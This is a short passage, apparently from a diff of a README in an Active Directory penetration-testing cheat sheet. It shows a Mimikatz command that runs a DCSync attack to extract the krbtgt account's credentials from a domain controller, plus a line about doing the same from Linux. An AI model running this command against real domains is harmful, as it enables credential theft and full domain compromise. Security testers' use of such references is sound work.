nicolagatta/Cheat-Sheet---Active-Directory/README.md

 #  Now the current session has the same rights as the DC
 # It's possibile to run a DCSYnc attack:
 Invoke-Mimikatz -Command '"lsadump::dcsync /user:corp\krbtgt"'

+# IT's also possible to do that on LInux with the tool C0ercer
 ```

 ### Constrained Delegation